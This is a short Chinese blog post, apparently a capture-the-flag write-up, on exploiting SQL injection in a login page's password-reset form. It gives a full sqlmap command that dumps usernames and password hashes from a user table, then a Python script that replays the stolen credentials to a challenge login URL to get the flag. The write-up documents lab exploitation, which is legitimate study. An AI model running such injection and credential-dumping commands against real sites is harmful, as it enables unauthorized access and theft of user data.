根据题目提示在登录及注册中有漏洞
首先进入登录界面,寻求漏洞,BP抓包,发现为明文传输,第一个想到爆破,但是爆破结果不尽人意,没有任何用出;接下来进行SQL注入尝试,但是俩个界面均没有POST注入漏洞,正要放弃时,发现在登录界面还有一个忘记密码界面,尝试在该界面进行SQL注入,
python2 sqlmap.py -r post.txt --dump -C "username,password" -T "user" -D "cetc004"
放进sqlmap直接跑出user表内的内容,如下图所示
其中admin为测试时注册数据,第一个username为自身信息,后password则为其密码,但是该md5加密后的数据无法在寻常网站上解密,故,构造一个python的请求报文脚本,来获取flag
import requests
url = 'http://111.198.29.45:54376/login.php'
username = 'c3tlwDmIn23'
password = '2f8667f381ff50ced6a3edc259260ba9'
payloads = { 'username':username, 'password':password }
r = requests.post(url, data = payloads)
print (r.text)
获取到的flag如下图所示
————————————————
版权声明:本文为CSDN博主「记忆湛蓝天空」的原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接及本声明。
原文链接:https://blog.csdn.net/qq_41941506/article/details/90381051
